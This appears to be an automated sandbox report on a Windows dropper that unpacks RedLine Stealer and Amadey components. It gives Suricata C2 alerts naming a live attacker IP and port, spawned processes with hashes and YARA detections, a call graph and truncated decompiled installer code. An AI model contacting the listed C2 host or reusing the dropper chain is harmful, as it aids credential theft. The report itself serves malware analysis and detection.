02/10/23-06:58:48.059056 | TCP | 2043234 | ET MALWARE Redline Stealer TCP CnC - Id1Response | 4131 | 49696 | 193.233.20.11 | 192.168.2.4
02/10/23-06:58:59.386011 | TCP | 2043231 | ET TROJAN Redline Stealer TCP CnC Activity | 49696 | 4131 | 192.168.2.4 | 193.233.20.11
02/10/23-06:58:46.675190 | TCP | 2043233 | ET TROJAN RedLine Stealer TCP CnC net.tcp Init | 49696 | 4131 | 192.168.2.4 | 193.233.20.11
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:57.729607105 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:57.753021955 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:57.806361914 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:57.929862022 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:57.953516960 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:57.994833946 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:59.221525908 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:59.244714022 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:59.245919943 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:59.269107103 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:59.322051048 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:59.362087011 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:59.385179043 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:59.385457993 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:59.386010885 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:59.409384012 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                            Feb 10, 2023 06:58:59.448290110 CET496964131192.168.2.4193.233.20.11

                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                            Start time:06:58:17
                                                                                                                                                                                                                                            Start date:10/02/2023
                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                            Imagebase:0x970000
                                                                                                                                                                                                                                            File size:798720 bytes
                                                                                                                                                                                                                                            MD5 hash:E46FC629E1740020F4CB10F793D38689
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.306383472.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                                            Start time:06:58:18
                                                                                                                                                                                                                                            Start date:10/02/2023
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\fuN31PL.exe
                                                                                                                                                                                                                                            Imagebase:0x1a0000
                                                                                                                                                                                                                                            File size:607232 bytes
                                                                                                                                                                                                                                            MD5 hash:1EA737E1D6A95AA35583293A9A2F5347
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                            • Detection: 69%, ReversingLabs
                                                                                                                                                                                                                                            • Detection: 55%, Virustotal, Browse
                                                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                                            Start time:06:58:18
                                                                                                                                                                                                                                            Start date:10/02/2023
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\fDI32WO.exe
                                                                                                                                                                                                                                            Imagebase:0xa80000
                                                                                                                                                                                                                                            File size:206848 bytes
                                                                                                                                                                                                                                            MD5 hash:156433A80D154CC7554D6D4E75C8E045
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000003.308397385.00000000045DD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                            • Detection: 64%, ReversingLabs
                                                                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                                            Start time:06:58:19
                                                                                                                                                                                                                                            Start date:10/02/2023
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\aRe53.exe
                                                                                                                                                                                                                                            Imagebase:0x5e0000
                                                                                                                                                                                                                                            File size:11264 bytes
                                                                                                                                                                                                                                            MD5 hash:7E93BACBBC33E6652E147E7FE07572A0
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                            • Detection: 85%, ReversingLabs
                                                                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                                                            Start time:06:58:26
                                                                                                                                                                                                                                            Start date:10/02/2023
                                                                                                                                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                            Imagebase:0x7ff712260000
                                                                                                                                                                                                                                            File size:69632 bytes
                                                                                                                                                                                                                                            MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high

Target ID:5
Start time:06:58:30
Start date:10/02/2023
Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe
Imagebase:0x860000
File size:179200 bytes
MD5 hash:EF8079CF160510D0DA7162BC08F753D8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.396243360.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000000.333078964.0000000000862000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe, Author: Joe Security
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bAS06bx.exe, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 96%, ReversingLabs
Reputation:moderate

Target ID:6
Start time:06:58:35
Start date:10/02/2023
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
Imagebase:0x7ff712260000
File size:69632 bytes
MD5 hash:73C519F050C20580F8A62C849D49215A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high

Target ID:7
Start time:06:58:43
Start date:10/02/2023
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
Imagebase:0x7ff712260000
File size:69632 bytes
MD5 hash:73C519F050C20580F8A62C849D49215A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high

Execution Graph

Execution Coverage:28.6%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:28.2%
Total number of Nodes:958
Total number of Limit Nodes:24
2754->2755 2755->2753 2756 97468f 7 API calls 2755->2756 2757 973d13 2755->2757 2762 973d7b CompareStringA 2755->2762 2763 973fd7 2755->2763 2764 973d26 2755->2764 2765 973fab 2755->2765 2769 973f46 LocalFree 2755->2769 2770 973f1e LocalFree 2755->2770 2774 973cc7 CompareStringA 2755->2774 2785 973e10 2755->2785 2969 971ae8 2755->2969 3010 97202a memset memset RegCreateKeyExA 2755->3010 3036 973fef 2755->3036 2756->2755 2758 9744b9 20 API calls 2757->2758 2758->2764 2760 976ce0 4 API calls 2761 973f60 2760->2761 2761->2470 2762->2755 2762->2763 2763->2764 3060 972267 2763->3060 2764->2760 2768 9744b9 20 API calls 2765->2768 2772 973fbe LocalFree 2768->2772 2769->2764 2770->2755 2770->2763 2772->2764 2774->2755 2775 973f92 2778 9744b9 20 API calls 2775->2778 2776 973e1f GetProcAddress 2777 973f64 2776->2777 2776->2785 2779 9744b9 20 API calls 2777->2779 2780 973fa9 2778->2780 2781 973f75 FreeLibrary 2779->2781 2782 973f7c LocalFree 2780->2782 2781->2782 2783 976285 GetLastError 2782->2783 2784 973f8b 2783->2784 2784->2764 2785->2775 2785->2776 2786 973f40 FreeLibrary 2785->2786 2787 973eff FreeLibrary 2785->2787 3050 976495 2785->3050 2786->2769 2787->2770 2789 97468f 7 API calls 2788->2789 2790 973a55 LocalAlloc 2789->2790 2791 973a8e 2790->2791 2792 973a6c 2790->2792 2794 97468f 7 API calls 2791->2794 2793 9744b9 20 API calls 2792->2793 2796 973a7d 2793->2796 2795 973a98 2794->2795 2797 973ac5 lstrcmpA 2795->2797 2798 973a9c 2795->2798 2799 976285 GetLastError 2796->2799 2801 973b0d LocalFree 2797->2801 2802 973ada 2797->2802 2800 9744b9 20 API calls 2798->2800 2805 972f64 2799->2805 2803 973aad LocalFree 2800->2803 2801->2805 2804 976517 24 API calls 2802->2804 2803->2805 2806 973aec LocalFree 2804->2806 2805->2438 2805->2472 2806->2805 2808 97628f 2807->2808 2808->2472 2810 97468f 7 API calls 2809->2810 2811 97417d LocalAlloc 2810->2811 2812 974195 2811->2812 2813 9741a8 2811->2813 2815 9744b9 20 API calls 2812->2815 2814 97468f 7 API calls 2813->2814 2816 
9741b5 2814->2816 2817 9741a6 2815->2817 2818 9741c5 lstrcmpA 2816->2818 2819 9741b9 2816->2819 2817->2472 2818->2819 2820 9741e6 LocalFree 2818->2820 2821 9744b9 20 API calls 2819->2821 2820->2817 2821->2820 2823 97171e _vsnprintf 2822->2823 2824 9762c9 FindResourceA 2823->2824 2826 976353 2824->2826 2827 9762cb LoadResource LockResource 2824->2827 2828 976ce0 4 API calls 2826->2828 2827->2826 2830 9762e0 2827->2830 2829 9751ca 2828->2829 2829->2671 2829->2672 2831 976355 FreeResource 2830->2831 2832 97631b FreeResource 2830->2832 2831->2826 2833 97171e _vsnprintf 2832->2833 2833->2824 2835 97548a 2834->2835 2854 97551a 2834->2854 2894 9753a1 2835->2894 2837 975581 2841 976ce0 4 API calls 2837->2841 2840 975495 2840->2837 2844 9754c2 GetSystemInfo 2840->2844 2845 97550c 2840->2845 2846 97559a 2841->2846 2842 97554d 2842->2837 2849 97597d 34 API calls 2842->2849 2843 97553b CreateDirectoryA 2847 975577 2843->2847 2848 975547 2843->2848 2852 9754da 2844->2852 2850 97658a CharPrevA 2845->2850 2846->2709 2858 972630 GetWindowsDirectoryA 2846->2858 2851 976285 GetLastError 2847->2851 2848->2842 2853 97555c 2849->2853 2850->2854 2855 97557c 2851->2855 2852->2845 2856 97658a CharPrevA 2852->2856 2853->2837 2857 975568 RemoveDirectoryA 2853->2857 2905 9758c8 2854->2905 2855->2837 2856->2845 2857->2837 2859 97266f 2858->2859 2860 97265e 2858->2860 2862 976ce0 4 API calls 2859->2862 2861 9744b9 20 API calls 2860->2861 2861->2859 2863 972687 2862->2863 2863->2696 2863->2710 2865 9769a1 2864->2865 2866 97696e GetDiskFreeSpaceA 2864->2866 2865->2719 2866->2865 2867 976989 MulDiv 2866->2867 2867->2865 2869 9759dd GetDiskFreeSpaceA 2868->2869 2870 9759bb 2868->2870 2872 975ba1 memset 2869->2872 2873 975a21 MulDiv 2869->2873 2871 9744b9 20 API calls 2870->2871 2874 9759cc 2871->2874 2875 976285 GetLastError 2872->2875 2873->2872 2876 975a50 GetVolumeInformationA 2873->2876 2877 976285 GetLastError 2874->2877 2878 975bbc GetLastError FormatMessageA 2875->2878 2879 975ab5 
SetCurrentDirectoryA 2876->2879 2880 975a6e memset 2876->2880 2881 9759d1 2877->2881 2882 975be3 2878->2882 2889 975acc 2879->2889 2883 976285 GetLastError 2880->2883 2887 976ce0 4 API calls 2881->2887 2884 9744b9 20 API calls 2882->2884 2885 975a89 GetLastError FormatMessageA 2883->2885 2886 975bf5 SetCurrentDirectoryA 2884->2886 2885->2882 2886->2881 2888 975c11 2887->2888 2888->2696 2890 975b0a 2889->2890 2892 975b20 2889->2892 2891 9744b9 20 API calls 2890->2891 2891->2881 2892->2881 2917 97268b 2892->2917 2896 9753bf 2894->2896 2895 97171e _vsnprintf 2895->2896 2896->2895 2897 97658a CharPrevA 2896->2897 2900 975415 GetTempFileNameA 2896->2900 2898 9753fa RemoveDirectoryA GetFileAttributesA 2897->2898 2898->2896 2899 97544f CreateDirectoryA 2898->2899 2899->2900 2901 97543a 2899->2901 2900->2901 2902 975429 DeleteFileA CreateDirectoryA 2900->2902 2903 976ce0 4 API calls 2901->2903 2902->2901 2904 975449 2903->2904 2904->2840 2906 9758d8 2905->2906 2906->2906 2907 9758df LocalAlloc 2906->2907 2908 9758f3 2907->2908 2909 975919 2907->2909 2910 9744b9 20 API calls 2908->2910 2912 97658a CharPrevA 2909->2912 2911 975906 2910->2911 2913 976285 GetLastError 2911->2913 2915 975534 2911->2915 2914 975931 CreateFileA LocalFree 2912->2914 2913->2915 2914->2911 2916 97595b CloseHandle GetFileAttributesA 2914->2916 2915->2842 2915->2843 2916->2911 2918 9726e5 2917->2918 2919 9726b9 2917->2919 2921 97271f 2918->2921 2922 9726ea 2918->2922 2920 97171e _vsnprintf 2919->2920 2924 9726cc 2920->2924 2923 9726e3 2921->2923 2926 97171e _vsnprintf 2921->2926 2925 97171e _vsnprintf 2922->2925 2927 976ce0 4 API calls 2923->2927 2928 9744b9 20 API calls 2924->2928 2929 9726fd 2925->2929 2930 972735 2926->2930 2931 97276d 2927->2931 2928->2923 2932 9744b9 20 API calls 2929->2932 2933 9744b9 20 API calls 2930->2933 2931->2881 2932->2923 2933->2923 2935 97468f 7 API calls 2934->2935 2936 974ff5 FindResourceA LoadResource LockResource 2935->2936 2937 975020 2936->2937 2948 97515f 
2936->2948 2938 975057 2937->2938 2939 975029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2937->2939 2953 974efd 2938->2953 2939->2938 2942 975060 2944 9744b9 20 API calls 2942->2944 2943 97507c 2945 9744b9 20 API calls 2943->2945 2949 975075 2943->2949 2944->2949 2945->2949 2946 975110 FreeResource 2950 97511d 2946->2950 2947 97513a 2947->2948 2951 97514c SendMessageA 2947->2951 2948->2736 2949->2946 2949->2950 2950->2947 2952 9744b9 20 API calls 2950->2952 2951->2948 2952->2947 2954 974f4a 2953->2954 2955 974980 25 API calls 2954->2955 2960 974fa1 2954->2960 2958 974f67 2955->2958 2956 976ce0 4 API calls 2957 974fc6 2956->2957 2957->2942 2957->2943 2959 974b60 FindCloseChangeNotification 2958->2959 2958->2960 2959->2960 2960->2956 2962 972510 2961->2962 2963 97255b 2961->2963 2964 97658a CharPrevA 2962->2964 2965 976ce0 4 API calls 2963->2965 2966 972522 WritePrivateProfileStringA _lopen 2964->2966 2967 972569 2965->2967 2966->2963 2968 972548 _llseek _lclose 2966->2968 2967->2746 2968->2963 2970 971b25 2969->2970 3074 971a84 2970->3074 2972 971b57 2973 97658a CharPrevA 2972->2973 2975 971b8c 2972->2975 2973->2975 2974 9766c8 2 API calls 2976 971bd1 2974->2976 2975->2974 2977 971d73 2976->2977 2978 971bd9 CompareStringA 2976->2978 2980 9766c8 2 API calls 2977->2980 2978->2977 2979 971bf7 GetFileAttributesA 2978->2979 2981 971d53 2979->2981 2982 971c0d 2979->2982 2983 971d7d 2980->2983 2984 971d64 2981->2984 2982->2981 2989 971a84 2 API calls 2982->2989 2985 971d81 CompareStringA 2983->2985 2986 971df8 LocalAlloc 2983->2986 2987 9744b9 20 API calls 2984->2987 2985->2986 2996 971d9b 2985->2996 2986->2984 2988 971e0b GetFileAttributesA 2986->2988 2990 971d6c 2987->2990 2991 971e1d 2988->2991 3009 971e45 2988->3009 2992 971c31 2989->2992 2995 976ce0 4 API calls 2990->2995 2991->3009 2993 971c50 LocalAlloc 2992->2993 3000 971a84 2 API calls 2992->3000 2993->2984 2994 971c67 GetPrivateProfileIntA GetPrivateProfileStringA 2993->2994 3003 971cf8 2994->3003 3007 971cc2 
2994->3007 2999 971ea1 2995->2999 2996->2996 3001 971dbe LocalAlloc 2996->3001 2999->2755 3000->2993 3001->2984 3002 971de1 3001->3002 3004 97171e _vsnprintf 3002->3004 3005 971d23 3003->3005 3006 971d09 GetShortPathNameA 3003->3006 3004->3007 3008 97171e _vsnprintf 3005->3008 3006->3005 3007->2990 3008->3007 3080 972aac 3009->3080 3011 972256 3010->3011 3012 97209a 3010->3012 3013 976ce0 4 API calls 3011->3013 3015 97171e _vsnprintf 3012->3015 3017 9720dc 3012->3017 3014 972263 3013->3014 3014->2755 3016 9720af RegQueryValueExA 3015->3016 3016->3012 3016->3017 3018 9720e4 RegCloseKey 3017->3018 3019 9720fb GetSystemDirectoryA 3017->3019 3018->3011 3020 97658a CharPrevA 3019->3020 3021 97211b LoadLibraryA 3020->3021 3022 97212e GetProcAddress FreeLibrary 3021->3022 3023 972179 GetModuleFileNameA 3021->3023 3022->3023 3024 97214e GetSystemDirectoryA 3022->3024 3025 9721de RegCloseKey 3023->3025 3028 972177 LocalAlloc 3023->3028 3026 972165 3024->3026 3024->3028 3025->3011 3027 97658a CharPrevA 3026->3027 3027->3028 3030 9721cd 3028->3030 3031 9721ec 3028->3031 3032 9744b9 20 API calls 3030->3032 3033 97171e _vsnprintf 3031->3033 3032->3025 3034 972218 RegSetValueExA RegCloseKey LocalFree 3033->3034 3034->3011 3037 974016 CreateProcessA 3036->3037 3049 974106 3036->3049 3038 9740c4 3037->3038 3039 974041 WaitForSingleObject GetExitCodeProcess 3037->3039 3041 976285 GetLastError 3038->3041 3042 974070 3039->3042 3040 976ce0 4 API calls 3043 974117 3040->3043 3044 9740c9 GetLastError FormatMessageA 3041->3044 3107 97411b 3042->3107 3043->2755 3047 9744b9 20 API calls 3044->3047 3046 974096 CloseHandle CloseHandle 3048 9740ba 3046->3048 3046->3049 3047->3049 3048->3049 3049->3040 3051 9764c2 3050->3051 3052 97658a CharPrevA 3051->3052 3053 9764d8 GetFileAttributesA 3052->3053 3054 976501 LoadLibraryA 3053->3054 3055 9764ea 3053->3055 3057 976508 3054->3057 3055->3054 3056 9764ee LoadLibraryExA 3055->3056 3056->3057 3058 976ce0 4 API calls 3057->3058 3059 976513 
3058->3059 3059->2785 3061 972289 RegOpenKeyExA 3060->3061 3063 972381 3060->3063 3061->3063 3064 9722b1 RegQueryValueExA 3061->3064 3062 976ce0 4 API calls 3065 97238c 3062->3065 3063->3062 3066 9722e6 memset GetSystemDirectoryA 3064->3066 3067 972374 RegCloseKey 3064->3067 3065->2764 3068 972321 3066->3068 3069 97230f 3066->3069 3067->3063 3071 97171e _vsnprintf 3068->3071 3070 97658a CharPrevA 3069->3070 3070->3068 3072 97233f RegSetValueExA 3071->3072 3072->3067 3076 971a9a 3074->3076 3077 971aaf 3076->3077 3078 971aba 3076->3078 3093 97667f 3076->3093 3077->3078 3079 97667f 2 API calls 3077->3079 3078->2972 3079->3077 3081 972ad4 GetModuleFileNameA 3080->3081 3082 972be6 3080->3082 3092 972b02 3081->3092 3083 976ce0 4 API calls 3082->3083 3085 972bf5 3083->3085 3084 972af1 IsDBCSLeadByte 3084->3092 3085->2990 3086 972b11 CharNextA CharUpperA 3089 972b8d CharUpperA 3086->3089 3086->3092 3087 972bca CharNextA 3088 972bd3 CharNextA 3087->3088 3088->3092 3089->3092 3091 972b43 CharPrevA 3091->3092 3092->3082 3092->3084 3092->3086 3092->3087 3092->3088 3092->3091 3098 9765e8 3092->3098 3095 976689 3093->3095 3094 9766a5 3094->3076 3095->3094 3096 976648 IsDBCSLeadByte 3095->3096 3097 976697 CharNextA 3095->3097 3096->3095 3097->3095 3099 9765f4 3098->3099 3099->3099 3100 9765fb CharPrevA 3099->3100 3101 976611 CharPrevA 3100->3101 3102 97661e 3101->3102 3103 97660b 3101->3103 3104 97663d 3102->3104 3105 976627 CharPrevA 3102->3105 3106 976634 CharNextA 3102->3106 3103->3101 3103->3102 3104->3092 3105->3104 3105->3106 3106->3104 3108 974132 3107->3108 3109 97412a 3107->3109 3111 971ea7 3108->3111 3109->3046 3112 971eba 3111->3112 3113 971ed3 3111->3113 3114 97256d 15 API calls 3112->3114 3113->3109 3114->3113 3116 972026 3115->3116 3117 971ff0 RegOpenKeyExA 3115->3117 3116->2480 3117->3116 3118 97200f RegDeleteValueA RegCloseKey 3117->3118 3118->3116 3266 9719e0 3267 971a24 GetDesktopWindow 3266->3267 3268 971a03 3266->3268 3269 9743d0 11 API calls 3267->3269 3270 
971a20 3268->3270 3272 971a16 EndDialog 3268->3272 3271 971a33 LoadStringA SetDlgItemTextA MessageBeep 3269->3271 3273 976ce0 4 API calls 3270->3273 3271->3270 3272->3270 3274 971a7e 3273->3274 3275 976a20 __getmainargs 3276 976bef _XcptFilter

Callgraph

Legend: Executed; Not Executed; Opacity -> Relevance; Disassembly available

Control-flow Graph

Legend: Executed; Not Executed
C-Code - Quality: 82%
E00973BA2() {
	signed int _v8;
	signed int _v12;
	char _v276;
	char _v280;
	short _v300;
	intOrPtr _v304;
	void _v348;
	char _v352;
	intOrPtr _v356;
	signed int _v360;
	short _v364;
	char* _v368;
	intOrPtr _v372;
	void* _v376;
	intOrPtr _v380;
	char _v384;
	signed int _v388;
	intOrPtr _v392;
	signed int _v396;
	signed int _v400;
	signed int _v404;
	void* _v408;
	void* _v424;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t69;
	signed int _t76;
	void* _t77;
	signed int _t79;
	short _t96;
	signed int _t97;
	intOrPtr _t98;
	signed int _t101;
	signed int _t104;
	signed int _t108;
	int _t112;
	void* _t115;
	signed char _t118;
	void* _t125;
                                                                                                                                                                                                                                              				signed int _t127;
                                                                                                                                                                                                                                              				void* _t128;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t129;
                                                                                                                                                                                                                                              				void* _t130;
                                                                                                                                                                                                                                              				short _t137;
                                                                                                                                                                                                                                              				char* _t140;
                                                                                                                                                                                                                                              				signed char _t144;
                                                                                                                                                                                                                                              				signed char _t145;
                                                                                                                                                                                                                                              				signed int _t149;
                                                                                                                                                                                                                                              				void* _t150;
                                                                                                                                                                                                                                              				void* _t151;
                                                                                                                                                                                                                                              				signed int _t153;
                                                                                                                                                                                                                                              				void* _t155;
                                                                                                                                                                                                                                              				void* _t156;
                                                                                                                                                                                                                                              				signed int _t157;
                                                                                                                                                                                                                                              				signed int _t162;
                                                                                                                                                                                                                                              				signed int _t164;
                                                                                                                                                                                                                                              				void* _t165;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                                                              				_t69 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                                                              				_t153 = 0;
                                                                                                                                                                                                                                              				 *0x979124 =  *0x979124 & 0;
                                                                                                                                                                                                                                              				_t149 = 0;
                                                                                                                                                                                                                                              				_v388 = 0;
                                                                                                                                                                                                                                              				_v384 = 0;
                                                                                                                                                                                                                                              				_t165 =  *0x978a28 - _t153; // 0x0
                                                                                                                                                                                                                                              				if(_t165 != 0) {
                                                                                                                                                                                                                                              					L3:
                                                                                                                                                                                                                                              					_t127 = 0;
                                                                                                                                                                                                                                              					_v392 = 0;
                                                                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                                                                              						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                                                              						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                                                              						_t164 = _t164 + 0xc;
                                                                                                                                                                                                                                              						_v348 = 0x44;
                                                                                                                                                                                                                                              						if( *0x978c42 != 0) {
                                                                                                                                                                                                                                              							goto L26;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t146 =  &_v396;
                                                                                                                                                                                                                                              						_t115 = E0097468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                                                              						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                                                              							L25:
                                                                                                                                                                                                                                              							_t146 = 0x4b1;
                                                                                                                                                                                                                                              							E009744B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              							 *0x979124 = 0x80070714;
                                                                                                                                                                                                                                              							goto L62;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							if(_v396 != 1) {
                                                                                                                                                                                                                                              								__eflags = _v396 - 2;
                                                                                                                                                                                                                                              								if(_v396 != 2) {
                                                                                                                                                                                                                                              									_t137 = 3;
                                                                                                                                                                                                                                              									__eflags = _v396 - _t137;
                                                                                                                                                                                                                                              									if(_v396 == _t137) {
                                                                                                                                                                                                                                              										_v304 = 1;
                                                                                                                                                                                                                                              										_v300 = _t137;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									goto L14;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_push(6);
                                                                                                                                                                                                                                              								_v304 = 1;
                                                                                                                                                                                                                                              								_pop(0);
                                                                                                                                                                                                                                              								goto L11;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_v304 = 1;
                                                                                                                                                                                                                                              								L11:
                                                                                                                                                                                                                                              								_v300 = 0;
                                                                                                                                                                                                                                              								L14:
                                                                                                                                                                                                                                              								if(_t127 != 0) {
                                                                                                                                                                                                                                              									L27:
                                                                                                                                                                                                                                              									_t155 = 1;
                                                                                                                                                                                                                                              									__eflags = _t127 - 1;
                                                                                                                                                                                                                                              									if(_t127 != 1) {
                                                                                                                                                                                                                                              										L31:
                                                                                                                                                                                                                                              										_t132 =  &_v280;
                                                                                                                                                                                                                                              										_t76 = E00971AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                                                              										__eflags = _t76;
                                                                                                                                                                                                                                              										if(_t76 == 0) {
                                                                                                                                                                                                                                              											L62:
                                                                                                                                                                                                                                              											_t77 = 0;
                                                                                                                                                                                                                                              											L63:
                                                                                                                                                                                                                                              											_pop(_t150);
                                                                                                                                                                                                                                              											_pop(_t156);
                                                                                                                                                                                                                                              											_pop(_t128);
                                                                                                                                                                                                                                              											return E00976CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_t157 = _v404;
                                                                                                                                                                                                                                              										__eflags = _t149;
                                                                                                                                                                                                                                              										if(_t149 != 0) {
                                                                                                                                                                                                                                              											L37:
                                                                                                                                                                                                                                              											__eflags = _t157;
                                                                                                                                                                                                                                              											if(_t157 == 0) {
                                                                                                                                                                                                                                              												L57:
                                                                                                                                                                                                                                              												_t151 = _v408;
                                                                                                                                                                                                                                              												_t146 =  &_v352;
                                                                                                                                                                                                                                              												_t130 = _t151; // executed
